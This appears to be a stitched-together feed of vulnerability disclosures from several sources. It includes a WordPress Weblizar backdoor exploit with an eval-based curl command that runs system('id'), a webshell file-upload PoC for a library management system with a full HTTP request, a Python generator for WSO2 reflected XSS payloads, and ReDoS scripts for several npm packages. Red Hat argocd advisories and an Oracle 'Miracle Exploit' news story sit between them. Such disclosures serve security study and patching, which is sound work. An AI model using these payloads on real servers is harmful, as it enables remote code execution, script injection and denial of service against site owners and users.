WordPress Weblizar plugin version 8.9 suffers from a remote code execution vulnerability.

    # Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor# Google Dork: 'wp-json/am-member/license'# Exploit Author: Sobhan Mahmoodi# Vendor Homepage: https://weblizar.com/plugins/school-management/# Version: 8.9# Tested on: windows/linuxVulnerable code:add_action( 'rest_api_init', function() {     register_rest_route(           'am-member', 'license',           array(                'methods' => WP_REST_Server::CREATABLE,                'callback' => function( $request ) {                                $args = $request->get_params();                                if ( isset( $args['blowfish'] ) && ! empty($args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )) {                                               eval( $args['blowf'] );                                }                      };                )      );} );If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, andgiven that eval executes the blowf value , Our favorite command must also be in this argument.Proof of Concept:curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www-data)

WordPress Weblizar 8.9 Code Execution

Library Management System with QR Code version 1.0 suffers from a remote shell upload vulnerability.

    #### Title: Library Management System with QR code Attendance_File UploadRCE#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md#### Description：#### At the file upload function, the application system checks thevalidity of the file type, format, and content uploaded by the user, sothat attackers can upload Webshell (.php, .jsp, asp, etc.) malicious scriptfiles or files in unexpected formats, such as: HTML files, SHTML files,etc., at the same time, you can use characters such as directory jump orcontrol the upload directory to directly upload files to the Web directoryor any directory, which may lead to the execution of arbitrary maliciousscript files on the remote server, thereby directly obtaining applicationsystem permissions.#### $uploaddir = 'assets/uploads/';#### $uploadfile = $uploaddir . basename($_FILES['image']['name']);#### Payload used:`<?php phpinfo();?>`### POC```POST /LMS/card/index.php HTTP/1.1Host: localhostContent-Length: 1056Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryngJP5BxPA6UsA91OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/card/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="name"File_Upload------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="grade"Computer Studies------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="dob"Student------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="address"Testing Testing------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="email"ashish@cyberthoth.in------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="exp_date"1990-02-11------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="id_no"8529637------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="phone"1212121212------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="image"; filename="File_upload.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryngJP5BxPA6UsA91O--```#### Access below URL:`http://localhost/LMS/card/assets/uploads/File_upload.php`![image](https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png)

Library Management System With QR Code 1.0 Shell Upload

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

    # Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;     # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;    # API Microgateway 2.2.0;    # Data Analytics Server 3.2.0;    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;    # Identity Server Analytics 5.5.0 and 5.6.0;    # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False):    log.info(f"Generating payload for {url}...")    if custom_payload:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")    else:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url):    if url.count("/") > 2:        return f"{url.split('/')[0]}//{url.split('/')[2]}"    else:        return urldef check_payload(payload):    encoded_characters = ['"', '<', '>']    if any(character in payload for character in encoded_characters):        log.info(f"Unsupported character(s) (\", <, >) found in payload.")        return False    else:        return urllib.parse.quote(payload)if __name__ == "__main__":    # Parse command line    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)    required_arguments = parser.add_argument_group('required arguments')    required_arguments.add_argument("-t", "--target",                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",                        required="True", action="store")    parser.add_argument("-p", "--payload",                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",                        action="store", default=False)    args = parser.parse_args()    # Clean user target input    args.target = clean_url_input(args.target.lower())    # Check for unsupported characters in custom payload; URL-encode as required    if args.payload:        args.payload = check_payload(args.payload)        if args.payload:            generate_payload(args.target, args.payload)    else:        generate_payload(args.target)

WSO2 Management Console Cross Site Scripting

Red Hat Security Advisory 2022-5192-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5192-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5192  
Issue date:        2022-06-24  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016   
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.3.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allow a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrZYPdzjgjWX9erEAQjrKg//fhNsc37/PGObQ+ILtKev6tbnelvEZXen  
q4eqQw+qbj2BXJyBVudmB1yrnMYc5ZcQViuQwAbhFafexFR5b6UjGr+g8x+5lSIq  
o/RBisD/Ob7/uavZua+ZzRutE3ER/f5YVK86AvK5cbk8hAlTtL0UN7RlFictYW+0  
hld0OyTXKUioPgwjZagQX7fhcyAKJsMIpnG8jZfygSsDje0fIDAHsyPfPGVWibUM  
1mRE9x618hFD+Dml70BpXE5X2CTnyfIQbWtPmR3KX5muhnh64zpNk3jGHhtjIqI9  
zT7CLR8o5Dvr6/n+HLT4WjPmfLiX2Hbo7fe4e4y2xdfkjDXPw4HoLr9ZF30FplG1  
eMhXCBWqyGYcYWh77lZlFLLQaz/ZE5pf7DxqwGzWBUUVrBFEJ+bIQKjB/y6WavnC  
rxCboZoqRifcvyKM1mDUcBK9YO14j9GXwb2Xu1IK7Z92RXZzZxIyRmJNRZDMzGF9  
uWxqBXbuSF/eRQFrRhJn8aeVzzxPMiqe/nRa1JsXJdMD8gyefVPloAVeRNx/0EbO  
4CpG2IGmQevfFx+E1ADM0X72TE0Bm1nzTSEd6D4i2DiA/NyYo2Ape3In9lHg8qYV  
XtcXBwBe14OJca+iAYTr3hMF/xzrCtfGd/lyf4ikQUMDWaNi2ixzA28MejDFJ0yl  
8b5s087AQwk=  
=FmJg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5192-01

Researchers describe discovery of ‘mega’ zero-day

Researchers describe discovery of ‘mega’ zero-day

Oracle has patched a remote code execution (RCE) vulnerability impacting Oracle Fusion Middleware and various other Oracle systems.

Security researchers ‘Peterjson’ and ‘Jang’ reported a pair of severe flaws to Oracle that can be chained to achieve RCE, which they dubbed the ‘Miracle Exploit’.

The researchers said they privately told Oracle about a serious vulnerability they discovered in Oracle Access Manager, tracked as CVE-2021–35587. The CVSS 9.8 bug is described as an “easily exploitable” flaw that allows unauthenticated attackers with network access via HTTP for application takeover.

**Accidental discovery**

Jang said the flaw was discovered by accident when the duo were “building a PoC \[proof of concept exploit code\] for another mega 0-day”.

While working with the Zero Day Initiative (ZDI), this research led to the discovery of CVE-2022–21445. This ‘mega’ bug, issued a severity score of 9.8, was found in the Oracle Application Development Framework (ADF) Faces architecture, a component of Oracle Fusion Middleware.

Catch up on the latest vulnerability-related security news and analysis

The deserialization of trusted data issue can be chained with CVE-2022–21497 (CVSS 8.1), a takeover flaw in Oracle Web Services Manager, to achieve pre-authentication RCE.

CVE-2022–21445 impacts a variety of products and services based on Fusion Middleware, various Oracle systems, and even Oracle’s cloud infrastructure. Unauthenticated attackers with network access, via HTTP, can abuse the vulnerability chain.

“One more thing to note, any website was developed by ADF Faces framework are affected,” Peterjson said.

**Disclosure and patches**

After testing Oracle services and domains, the vulnerability report was submitted to the vendor on October 25, 2021. In the same month, Oracle confirmed receipt of the report and said it was investigating. However, it took the best part of six months for a patch to be issued.

Both issues have been resolved in Oracle’s April round of patches. Oracle is one of many technology vendors, alongside Microsoft and Adobe, that releases a monthly patch update to tackle bugs in its software.

Companies utilizing vulnerable Oracle software are urged to apply the patch immediately.

Other vendors potentially impacted by the pre-auth RCE were notified via their respective bug bounty programs. Peterjson told The Stack that companies have been informed if they have not applied Oracle’s fix, and that he believes the number of exposed instances is “huge”.

“Why \[did\] we hack some Oracle’s sites? Because we want to demonstrate the impact to Oracle and let them know this vulnerability is super dangerous, it affects Oracle system\[s\] and Oracle’s customers,” Peterjson commented.

“That’s why we want Oracle take an action ASAP. But as you can see, 6 months for Oracle to patch it, I don’t know why, but we have to accept it and follow Oracle’s policy.”

The Daily Swig has reached out to Oracle and we will update this story if and when we hear back.

YOU MIGHT ALSO LIKE Splunk patches critical vulnerability while users push for legacy updates

Oracle patches ‘miracle exploit’ impacting Middleware Fusion, cloud services

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in scniro-validator v1.0.1 when validating crafted invalid emails.

Permalink

Cannot retrieve contributors at this time

/\*\*

\* scniro-validator@1.0.1

\* Package Manager: npm

\* Link to published package: https://github.com/scniro/scniro-validator

\* Link to GitHub repo: https://github.com/scniro/scniro-validator

\* Severity level: High

\* Module Description: a small, dependency-free email validator with configurable rules and suggested corrections

\* Additional Info: It allows cause a denial of service when validating crafted invalid emails.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

var v \= require('scniro-validator');

function build\_blank(n) {

var ret \= "a@"

for (var i \= 0; i < n; i++) {

ret += "a"

}

return ret + "!";

}

for(var i \= 1; i <= 5000000; i++) {

var time \= Date.now();

var attack\_str \= build\_blank(i)

var result \= v.validate(attack\_str);

var time\_cost \= Date.now() \- time;

console.log("attack\_str.length: " + attack\_str.length + ": " + time\_cost+" ms")

}

CVE-2021-40901: SaveResults/scniro-validator.js at main · yetingli/SaveResults

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in regexfn v1.0.5 when validating crafted invalid emails.

Permalink

Cannot retrieve contributors at this time

/\*\*

\* regexfn@1.0.5

\* Package Manager: npm

\* Link to published package: https://github.com/Jeyaprakash1206/regexfn

\* Link to GitHub repo: https://github.com/Jeyaprakash1206/regexfn

\* Severity level: High

\* Module Description: Functions available for Common RegEx Validations

\* Additional Info: It allows cause a denial of service when validating crafted invalid emails.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

const regex \= require('regexfn');

console.log(regex.isEmail("0000000000000000000000000000000000000000000000000000000000000000000000000000000000!"));

CVE-2021-40900: SaveResults/regexfn.js at main · yetingli/SaveResults

An update is now available for Red Hat OpenShift GitOps 1.4.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-31016: argocd: vulnerable to an uncontrolled memory consumption bug
* CVE-2022-31034: argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.
* CVE-2022-31035: argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI
* CVE-2022-31036: argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

发布：

2022-06-22

已更新：

2022-06-22

**RHSA-2022:5153 - Security Advisory**

*   概述
*   更新的软件包

**概述**

Important: Red Hat OpenShift GitOps security update

**类型/严重性**

Security Advisory: Important

**标题**

An update is now available for Red Hat OpenShift GitOps 1.4.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**描述**

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.  

Security Fix(es):  

*   argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI. (CVE-2022-31034)
*   argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI (CVE-2022-31035)
*   argocd: vulnerable to an uncontrolled memory consumption bug (CVE-2022-31016)
*   argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**受影响的产品**

*   Red Hat OpenShift GitOps 1.4 x86\_64

**修复**

*   BZ - 2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI
*   BZ - 2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.
*   BZ - 2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug
*   BZ - 2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

**CVE**

*   CVE-2022-1271
*   CVE-2022-31016
*   CVE-2022-31034
*   CVE-2022-31035
*   CVE-2022-31036

**参考**

*   https://access.redhat.com/security/updates/classification/#important

**Red Hat OpenShift GitOps 1.4**

SRPM

x86\_64

Red Hat 安全团队联络方式为 secalert@redhat.com。 更多联络细节请参考 https://access.redhat.com/security/team/contact/。

RHSA-2022:5153: Red Hat Security Advisory: Red Hat OpenShift GitOps security update

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in repo-git-downloader v0.1.1 when downloading crafted invalid git repositories.

Permalink

Cannot retrieve contributors at this time

/\*\*

\* repo-git-downloader@0.1.1

\* Package Manager: npm

\* Link to published package: https://github.com/mnichangxin/repo-git-downloader

\* Link to GitHub repo: https://github.com/mnichangxin/repo-git-downloader

\* Severity level: High

\* Module Description: A tool to download git repository

\* Additional Info: It allows cause a denial of service when downloading crafted invalid git repositories.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

var download \= require("repo-git-downloader")

download('git@github.com:--/--#################################################################################################################################################################!')

CVE-2021-40899: SaveResults/repo-git-downloader.js at main · yetingli/SaveResults

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in scaffold-helper v1.2.0 when copying crafted invalid files.

Permalink

/\*\*

\* scaffold-helper@1.2.0

\* Package Manager: npm

\* Link to published package: https://github.com/cliffpyles/scaffold-helper

\* Link to GitHub repo: https://github.com/cliffpyles/scaffold-helper

\* Severity level: High

\* Module Description: Helps with generating files and file structures

\* Additional Info: It allows cause a denial of service when copying crafted invalid files.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

var scaffold, { getProcessedPath, getRenderedTemplate } \= require("scaffold-helper")

// getProcessedPath('/example/\_\_projectName\_\_/src/components/\_\_componentType\_\_', {

// projectName: 'abc-app',

// componentType: 'Alert',

// });

getProcessedPath('/example/\_\_--------------------------------------------------------------------------------------------------------------------------!', {

projectName: 'abc-app',

componentType: 'Alert',

});

Tag

#js